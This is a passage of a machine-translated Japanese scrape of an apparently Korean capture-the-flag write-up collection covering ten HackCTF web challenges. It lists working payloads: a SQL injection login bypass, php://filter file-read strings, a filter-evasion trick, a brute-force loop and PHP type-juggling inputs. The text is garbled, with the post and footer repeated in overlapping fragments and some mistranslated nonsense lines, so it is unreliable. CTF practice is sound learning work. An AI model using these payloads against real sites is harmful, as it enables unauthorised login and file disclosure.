HACKCTFプールの収集
3570 ワード
1. /
robots.txtを確認します.
2. Hidden ?id=5
3. Button
button=flagでvalue値を変更すればいいです.
4.宝物
和音を編んでできあがったfor i in range(1000,10000):
url = f"http://ctf.j0n9hyun.xyz:2025/?page={i}"
res=requests.get(url=url, headers=headers, verify=False)
if res.text.find("HackCTF") != -1:
print("find!", i, res.text)
break
5. Guess me extract
弱点.
filename=flag.変数をtxtにするようにしましょう.
回答:?filename=flag.txt&guess=Nah...
6. Read File
以下のフィルタリングを行っています(ゲーム...)$command = $_GET['command'];
$command = preg_replace("/flag/" , "" , $command);
command=flflagag.php
と入力します.
phpパッケージも使用できます.php://filter/convert.base64-encode/resource=flflagag.php
php://filter/read=string.toupper/resource=flflagag.php
7. Login
id = admin'||1-- g
pw=勝手
8.魔法の棒
sha1 magic hash : 10932435112
9. Time
time = 0.6e7
sleepではintタイプcastingの過程で小数点が下がるが,実際の実験ではそうではない...みんなはどうしてそんなに分かりやすいのですか.
さらなる研究が必要らしい.先にスキップ
10. Input Check ?text[]=flag
ヒントのある質問
Reference
この問題について(HACKCTFプールの収集), 我々は、より多くの情報をここで見つけました
https://velog.io/@hunjison/HackCTF-풀이-모음
テキストは自由に共有またはコピーできます。ただし、このドキュメントのURLは参考URLとして残しておいてください。
Collection and Share based on the CC Protocol
?id=5
3. Button
button=flagでvalue値を変更すればいいです.
4.宝物
和音を編んでできあがったfor i in range(1000,10000):
url = f"http://ctf.j0n9hyun.xyz:2025/?page={i}"
res=requests.get(url=url, headers=headers, verify=False)
if res.text.find("HackCTF") != -1:
print("find!", i, res.text)
break
5. Guess me extract
弱点.
filename=flag.変数をtxtにするようにしましょう.
回答:?filename=flag.txt&guess=Nah...
6. Read File
以下のフィルタリングを行っています(ゲーム...)$command = $_GET['command'];
$command = preg_replace("/flag/" , "" , $command);
command=flflagag.php
と入力します.
phpパッケージも使用できます.php://filter/convert.base64-encode/resource=flflagag.php
php://filter/read=string.toupper/resource=flflagag.php
7. Login
id = admin'||1-- g
pw=勝手
8.魔法の棒
sha1 magic hash : 10932435112
9. Time
time = 0.6e7
sleepではintタイプcastingの過程で小数点が下がるが,実際の実験ではそうではない...みんなはどうしてそんなに分かりやすいのですか.
さらなる研究が必要らしい.先にスキップ
10. Input Check ?text[]=flag
ヒントのある質問
Reference
この問題について(HACKCTFプールの収集), 我々は、より多くの情報をここで見つけました
https://velog.io/@hunjison/HackCTF-풀이-모음
テキストは自由に共有またはコピーできます。ただし、このドキュメントのURLは参考URLとして残しておいてください。
Collection and Share based on the CC Protocol
和音を編んでできあがった
for i in range(1000,10000):
url = f"http://ctf.j0n9hyun.xyz:2025/?page={i}"
res=requests.get(url=url, headers=headers, verify=False)
if res.text.find("HackCTF") != -1:
print("find!", i, res.text)
break
5. Guess me extract
弱点.
filename=flag.変数をtxtにするようにしましょう.
回答:?filename=flag.txt&guess=Nah...
6. Read File
以下のフィルタリングを行っています(ゲーム...)$command = $_GET['command'];
$command = preg_replace("/flag/" , "" , $command);
command=flflagag.php
と入力します.
phpパッケージも使用できます.php://filter/convert.base64-encode/resource=flflagag.php
php://filter/read=string.toupper/resource=flflagag.php
7. Login
id = admin'||1-- g
pw=勝手
8.魔法の棒
sha1 magic hash : 10932435112
9. Time
time = 0.6e7
sleepではintタイプcastingの過程で小数点が下がるが,実際の実験ではそうではない...みんなはどうしてそんなに分かりやすいのですか.
さらなる研究が必要らしい.先にスキップ
10. Input Check ?text[]=flag
ヒントのある質問
Reference
この問題について(HACKCTFプールの収集), 我々は、より多くの情報をここで見つけました
https://velog.io/@hunjison/HackCTF-풀이-모음
テキストは自由に共有またはコピーできます。ただし、このドキュメントのURLは参考URLとして残しておいてください。
Collection and Share based on the CC Protocol
以下のフィルタリングを行っています(ゲーム...)
$command = $_GET['command'];
$command = preg_replace("/flag/" , "" , $command);
command=flflagag.php
と入力します.phpパッケージも使用できます.
php://filter/convert.base64-encode/resource=flflagag.php
php://filter/read=string.toupper/resource=flflagag.php
7. Login
id = admin'||1-- g
pw=勝手
8.魔法の棒
sha1 magic hash : 10932435112
9. Time
time = 0.6e7
sleepではintタイプcastingの過程で小数点が下がるが,実際の実験ではそうではない...みんなはどうしてそんなに分かりやすいのですか.
さらなる研究が必要らしい.先にスキップ
10. Input Check ?text[]=flag
ヒントのある質問
Reference
この問題について(HACKCTFプールの収集), 我々は、より多くの情報をここで見つけました
https://velog.io/@hunjison/HackCTF-풀이-모음
テキストは自由に共有またはコピーできます。ただし、このドキュメントのURLは参考URLとして残しておいてください。
Collection and Share based on the CC Protocol
sha1 magic hash : 10932435112
9. Time
time = 0.6e7
sleepではintタイプcastingの過程で小数点が下がるが,実際の実験ではそうではない...みんなはどうしてそんなに分かりやすいのですか.
さらなる研究が必要らしい.先にスキップ
10. Input Check ?text[]=flag
ヒントのある質問
Reference
この問題について(HACKCTFプールの収集), 我々は、より多くの情報をここで見つけました
https://velog.io/@hunjison/HackCTF-풀이-모음
テキストは自由に共有またはコピーできます。ただし、このドキュメントのURLは参考URLとして残しておいてください。
Collection and Share based on the CC Protocol
?text[]=flag
ヒントのある質問
Reference
この問題について(HACKCTFプールの収集), 我々は、より多くの情報をここで見つけました https://velog.io/@hunjison/HackCTF-풀이-모음テキストは自由に共有またはコピーできます。ただし、このドキュメントのURLは参考URLとして残しておいてください。
Collection and Share based on the CC Protocol